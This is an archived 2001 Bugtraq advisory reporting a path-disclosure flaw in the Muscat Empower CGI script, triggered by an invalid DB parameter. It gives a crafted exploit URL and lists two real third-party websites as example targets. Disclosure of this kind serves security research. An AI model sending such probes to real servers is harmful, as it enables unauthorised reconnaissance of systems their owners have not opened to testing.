[19136] in bugtraq
Vulnerability in Muscat Empower wich can print path to DB-dir.
daemon@ATHENA.MIT.EDU (UkR-XblP�)
Mon Feb 12 15:29:57 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="KOI8-R"
Content-Transfer-Encoding: 8bit
Message-Id: <web-16666099@backend2.aha.ru>
Date: Mon, 12 Feb 2001 17:18:20 +0300
Reply-To: UkR-XblP� <cuctema@OK.RU>
From: UkR-XblP� <cuctema@OK.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
-----------UkR security team advisory #6------------
Vulnerability in Muscat Empower wich can print path to
DB-dir.
--------------------------------------------------
Name: Vulnerability in Muscat Empower wich can print path to
DB-dir.
Date: 03.02.2001
Problem: when the request invalid send to database script
print path to it.
Author: UkR-XblP
Exploit: http://www.example.com/cgi-bin/empower?DB=UkRteamHole
Example:
http://www.nokia.com/cgi-bin/empower?DB=UkRteamHole
http://www.hmso.gov.uk/cgi-bin/empower?DB=UkRteamHole
Get your free e-mail address at http://www.zmail.ru
